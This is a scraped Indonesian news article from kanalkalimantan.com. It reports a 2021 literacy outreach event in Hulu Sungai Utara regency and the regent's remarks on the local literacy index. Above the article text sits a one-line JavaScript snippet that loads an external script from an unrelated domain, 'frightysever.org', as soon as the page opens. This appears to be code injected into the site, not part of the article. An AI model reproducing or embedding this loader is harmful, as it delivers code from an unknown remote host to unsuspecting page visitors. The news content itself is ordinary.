(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Tingkatkan IPLM, Dispersip HSU Gelar Sosialisasi Penguatan Literasi


KANALKALIMANTAN.COM, AMUNTAI – Guna meningkatkan Indeks Pembangunan Literasi Masyarakat (IPLM) Dinas Perpustakaan dan Kearsipan (Dispersip)Kabupaten Hulu Sungai Utara (HSU) menggelar Sosialisasi Penguatan Literasi di aula Kantor Dispersip HSU, Selasa (13/7/2021).

Kegiatan yang melibatkan komunitas inspiralova, komunitas penulis, pengelola perpustakaan desa, pustakawan sekolah, mahasiswa, pelajar, dan komunitas sekolah guru Indonesia ini, dihadiri langsung Bupati HSU H Abdul Wahid HK.

Dalam sambutannya, Bupati Wahid mengatakan kegiatan ini memiliki makna yang sangat penting dan strategis. Sebab kegiatan ini tentunya memiliki tujuan untuk membangun penguatan literasi di Kabupaten HSU serta meningkatkan kerjasama dan kolaborasi semua stake holder.

“Para pemangku kebijakan, pegiat literasi , komunitas – komunitas literasi dan penulis serta berbagai elemen masyarakat dalam pengembangan perpustakaan dan pembudayaan kegemaran membaca,” katanya.

 

 

Baca juga: PKK Kalsel Berbagi Peduli di Tengah Pandemi Covid-19 di Sungai Martapura

Menurut Bupati Wahid, hal ini sesuai Undang -Undang 43 tahun 2007 tentang perpustakaan dan sesuai Peraturan Daerah No. 03 tahun 2020 tentang penyelenggaraan perpustakaan di Kabupaten HSU.

“Prioritas pemerintah pada rencana pembangunan jangka menengah (RPJMN) 2020 – 2024 menitik beratkan pembangunan sumber daya manusia yang berkualitas dan berdaya saing.

Untuk mencapai ke arah tersebut memerlukan pembangunan manusia yang berkarakter melalui penguatan budaya, inovasi, kreativitas dan literasi,” imbuhnya.

Menurutnya, peran perpustakaan sekarang sudah bertransformasi menjadi sahabat masyarakat dalam menciptakan sumber daya manusia yang unggul.

“Karenanya kegiatan transformasi perpustakaan berbasis inklusi sosial ini bertujuan meningkatkan kesejahteraan masyarakat, melalui berbagai aktivitas pendampingan keahlian sesuai di bidangnya masing – masing yang difasilitasi oleh perpustakaan umum daerah,” kata Bupati Wahid.

Wahid mengatakan, pada tahun 2020 lalu, nilai IPLM Kalsel berada di urutan pertama nasional.

Baca juga: Ngamuk Bawa Sajam di Pasar Antasari, Dilumpuhkan dengan Tembakan


“Dengan nilai 48,7 dan kabupaten HSU sesuai laporan tahunan dengan nilai IPLM 18,9, nilai tersebut diatas rata rata target nasional yaitu 12,5,” bebernya.

Kegiatan sosialisasi penguatan literasi seperti ini akan terus dilaksanakan untuk mendongkrak minat baca masyarakat. Untuk itu diharapkan peran serta para pengelola perpustakaan, perpustakaan Sekolah maupun perpustakaan desa, pegiat literasi, komunitas – komunitas literasi dapat membantu gerakan sadar literasi yang sedang galakkan.

“Hal ini merupakan tugas kita bersama untuk daerah yang kita cintai, mewujudkan masyarakat yang cerdas dan inovatif adalah tujuan kita bersama,” katanya.

Sementara itu Kepala Dispersip HSU Hj. Lailatanur Raudhah, dalam sambutannya mengatakan salah satu upaya peningkatan sumber daya manusia adalah peningkatan pengetahuan masyarakat dengan mendorong minat dan kemauan masyarakat untuk membaca buku.

Baca juga: VIDEO VIRAL! Suami Talak Istri Setelah 1 Menit Ijab Qobul

“Karena pentingnya budaya literasi ini sampai sekarang untuk tahun ini di PKK juga merupakan program nasional bagaimana meningkatkan minat baca, hanya saja kebetulan leading sektornya ada di tempat kita, jadi ini artinya seluruh Indonesia mengharapkan agar IPLM kita meningkat,” katanya.

Menurutnya, pemanfaatan teknologi bisa dimaksimalkan untuk memberdayakan kreativitas dalam pengembangan literasi yang mempunyai pengaruh penting dalam keberhasilan generasi muda.

“Karenanya pengembangan perpustakaan dan budaya membaca harus dilaksanakan melalui berbagai kegiatan dan sinergitas seluruh elemen masyarakat, salah satunya bekerja sama dengan komunitas – komunitas pegiat literasi,” tutupnya.

Pada kesempatan tersebut, Bupati HSU juga berkesempatan memberikan Qur’an untuk Dispersip sebagai bentuk dukungan program peningkatan literasi.(kanalkalimantan.com/dew)

Reporter: dew
Editor: cell


Risa

Recent Posts

HMI Banjarmasin Komitmen Perjuangkan Kesejahteraan dan Hak Buruh

KANALKALIMANTAN.COM, BANJARMASIN - Demo mahasiswa yang tergabung dalam Himpunan Mahasiswa Islam (HMI) Cabang Banjarmasin dan… Read More

10 jam ago

May Day di Kuala Kapuas, Pj Bupati Erlin Hardi Jalan Santai Bersama Buruh dan Masyarakat

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi peringati Hari Buruh Sedunia atau… Read More

10 jam ago

SPM Pendidikan Banjarbaru Capai Skor 84,57, BPMP Kalsel Beri Penghargaan ke Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU - Kementerian Pendidikan, Kebudayaan, Riset, dan Teknologi melalui Balai Penjamin Mutu Pendidikan (BPMP)… Read More

11 jam ago

Manasik Haji 2024 Ditutup, Ini Pesan Bupati Banjar untuk Jemaah Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Asisten Bidang Perekonomian dan Pembangunan Pemkab Banjar, Ikhwansyah, menutup kegiatan Manasik Haji… Read More

12 jam ago

D’Bakso Hadir Manjakan Lidah Warga Palangkaraya dengan Ragam Menu Bakso

KANALKALIMANTAN.COM, PALANGKARAYA – Bakso merupakan kuliner yang sangat populer dan disukai masyarakat Indonesia. Kelezatan olahan… Read More

13 jam ago

Gelar Rembuk Stunting, Pj Bupati HSU Inginkan Pencegahan Gagal Tumbuh Anak Secara Bersama

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara (HSU) terus berupaya mempercepat pencegahan dan penurunan… Read More

13 jam ago

This website uses cookies.